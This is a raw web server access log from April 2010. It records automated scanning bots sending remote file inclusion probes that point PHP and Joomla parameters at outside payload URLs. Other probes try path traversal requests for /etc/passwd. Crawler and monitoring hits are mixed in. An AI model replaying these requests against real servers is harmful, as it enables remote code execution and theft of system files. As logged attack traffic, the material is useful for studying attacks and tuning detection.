79.98.23.9 - - [16/Apr/2010:02:41:46 -0400] "GET /logs/access_log.Q109101500/?sourcedir=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:41:51 -0400] "GET /logs/access_log.Q110040600/?sourcedir=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:02:41:53 -0400] "GET /logs/error_log.Q110040600/?sourcedir=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:02:42:00 -0400] "GET /logs/error_log.Q109060400//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
118.220.174.202 - - [16/Apr/2010:02:42:06 -0400] "GET //include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:07 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:09 -0400] "GET /logs/access_log.Q110010700%20%20//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:11 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:11 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:11 -0400] "GET /logs/access_log.Q109072400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:42:12 -0400] "GET /logs/access_log.Q109070800%20%20//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:42:16 -0400] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://moncrot.justfree.com/ide.pdf?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:42:16 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://moncrot.justfree.com/ide.pdf?? HTTP/1.1" 200 454 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:42:17 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://moncrot.justfree.com/ide.pdf?? HTTP/1.1" 200 46449 "-" "libwww-perl/5.65"
89.185.231.103 - - [16/Apr/2010:02:42:40 -0400] "GET /logs/access_log.Q109100100/.comment.php?bbs=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.185.231.103 - - [16/Apr/2010:02:42:40 -0400] "GET /logs/error_log.Q109100100/.comment.php?bbs=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:42:46 -0400] "GET //admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:42:46 -0400] "GET /logs/error_log.Q110033100%20%20//admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:42:46 -0400] "GET /logs//admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:02:42:44 -0400] "GET /logs/error_log.Q109100400 HTTP/1.0" 200 3855615 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.67.232 - - [16/Apr/2010:02:43:07 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LA28B6B5C71166000F23302X+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.55.232.50 - - [16/Apr/2010:02:43:18 -0400] "GET /logs/access_log.Q109081000//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:43:18 -0400] "GET //?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:43:19 -0400] "GET /logs//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 46447 "-" "libwww-perl/5.65"
189.78.119.115 - - [16/Apr/2010:02:43:27 -0400] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
212.241.251.224 - - [16/Apr/2010:02:43:36 -0400] "GET /logs/error_log.Q109070600///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:43:36 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:43:39 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:43:39 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:43:41 -0400] "GET /logs/access_log.Q110031400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:43:46 -0400] "GET /logs/access_log.Q110011500%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:44:09 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:44:09 -0400] "GET /logs/access_log.Q109110100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.119.215.85 - - [16/Apr/2010:02:44:33 -0400] "GET //index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:44:34 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://moncrot.justfree.com/ide.pdf?? HTTP/1.1" 200 454 "-" "libwww-perl/5.65"
68.119.215.85 - - [16/Apr/2010:02:44:34 -0400] "GET /logs/error_log.Q109062400%20%20//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
68.119.215.85 - - [16/Apr/2010:02:44:34 -0400] "GET /logs//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:44:40 -0400] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://moncrot.justfree.com/ide.pdf?? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
118.220.174.202 - - [16/Apr/2010:02:44:42 -0400] "GET /logs/access_log.Q109070300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:44:49 -0400] "GET /images/index_membranes.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
118.220.174.202 - - [16/Apr/2010:02:44:55 -0400] "GET /logs/error_log.Q109062400%20%20//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:44:55 -0400] "GET //index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:44:55 -0400] "GET /logs//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:45:01 -0400] "GET /logs/error_log.Q109081000//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
118.129.170.49 - - [16/Apr/2010:02:45:14 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:14 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:14 -0400] "GET /logs/access_log.Q109122000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:45:21 -0400] "GET /logs/access_log.Q109062400%20%20//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:25 -0400] "GET /logs/access_log.Q109122000%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:28 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:28 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:31 -0400] "GET /logs/access_log.Q109102900%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
68.119.215.85 - - [16/Apr/2010:02:45:39 -0400] "GET /logs/access_log.Q109062400%20%20//index2.php?page=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:02:45:42 -0400] "GET /logs/access_log.Q109102900%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:46:00 -0400] "GET /logs/access_log.Q110040600/?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.69.115.198 - - [16/Apr/2010:02:46:02 -0400] "GET /logs/error_log.Q110040600/?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:02:46:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.252 - - [16/Apr/2010:02:47:34 -0400] "GET /logs/error_log.Q109071900 HTTP/1.0" 200 2993552 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.122.210 - - [16/Apr/2010:02:48:32 -0400] "GET /logs/access_log.Q109082100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:02:48:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L02033C553B9449008F90094+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.139.0.75 - - [16/Apr/2010:02:49:05 -0400] "GET /logs/error.php?dir=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:02:49:05 -0400] "GET /error.php?dir=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
221.139.0.75 - - [16/Apr/2010:02:49:05 -0400] "GET /logs/access_log.Q110032200/error.php?dir=http://www.hackclub.com.ar/javascript//id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs/access_log.Q109091200%20%20//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs/access_log.Q109100200%20%20//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs/access_log.Q109100200%20%20//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:08 -0400] "GET /logs/access_log.Q109091200%20%20//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:09 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:09 -0400] "GET /logs/access_log.Q109100200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET /logs/access_log.Q109100200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET /logs/access_log.Q109091200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:10 -0400] "GET /logs/access_log.Q109091200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:44 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:44 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:49:44 -0400] "GET /logs/access_log.Q109070200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:48 -0400] "GET ///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:48 -0400] "GET /logs///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:48 -0400] "GET /logs/error_log.Q109072100%20%20///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:49 -0400] "GET /logs/access_log.Q109122300%20%20///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:55 -0400] "GET ///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:55 -0400] "GET /logs///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:55 -0400] "GET /logs/error_log.Q109072100%20%20///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.121.24.1 - - [16/Apr/2010:02:49:57 -0400] "GET /logs/access_log.Q109122300%20%20///skin/member/?g4[path]=http://freecopts.net/arabic//id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:06 -0400] "GET /logs/access_log.Q109101500//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:06 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:06 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:50:15 -0400] "GET /logs/access_log.Q109063000//?admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
84.40.30.37 - - [16/Apr/2010:02:50:15 -0400] "GET /logs/access_log.Q109070200//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:15 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:15 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:50:15 -0400] "GET //?admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
84.40.30.37 - - [16/Apr/2010:02:50:16 -0400] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:50:16 -0400] "GET /logs//?admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 46447 "-" "libwww-perl/5.65"
79.98.23.9 - - [16/Apr/2010:02:50:22 -0400] "GET /logs/error_log.Q110033100//admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:39 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:39 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:39 -0400] "GET /logs/access_log.Q109090700//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:40 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:40 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:40 -0400] "GET /logs/access_log.Q109090700//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:52 -0400] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:02:50:53 -0400] "GET /logs/access_log.Q109101500//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:53 -0400] "GET /logs/error_log.Q109090700//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:50:53 -0400] "GET /logs/error_log.Q109090700//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:51:08 -0400] "GET /logs/access_log.Q109090700%20%20//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:51:08 -0400] "GET /logs/error_log.Q109090700%20%20//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:51:09 -0400] "GET /logs/access_log.Q109090700%20%20//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:02:51:09 -0400] "GET /logs/error_log.Q109090700%20%20//components/com_flyspray/startdown.php?file=http://www.hantechsys.com/board/a/id1?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:51:36 -0400] "GET /logs/access_log.Q109091800//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:51:37 -0400] "GET //?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:51:37 -0400] "GET /logs//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 46447 "-" "libwww-perl/5.65"
189.78.119.115 - - [16/Apr/2010:02:51:42 -0400] "GET /logs/access_log.Q109060400//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:02:51:44 -0400] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:02:51:46 -0400] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
119.235.18.81 - - [16/Apr/2010:02:52:39 -0400] "GET //pds_uks_down_v2010//write.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:52:53 -0400] "GET /logs/access_log.Q109081100//?admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
119.235.18.81 - - [16/Apr/2010:02:53:04 -0400] "GET //pds_uks_down_v2010//write.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.235.18.81 - - [16/Apr/2010:02:53:04 -0400] "GET /logs/error_log.Q109113000//pds_uks_down_v2010//write.php?dir=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:53:40 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:53:40 -0400] "GET /logs/access_log.Q109072400%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:53:40 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:02:54:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.67.232 - - [16/Apr/2010:02:54:27 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L029814584B44480042F0091+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.69.115.198 - - [16/Apr/2010:02:54:41 -0400] "GET /logs/error_log.Q110033100//admin/auth.php?xcart_dir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
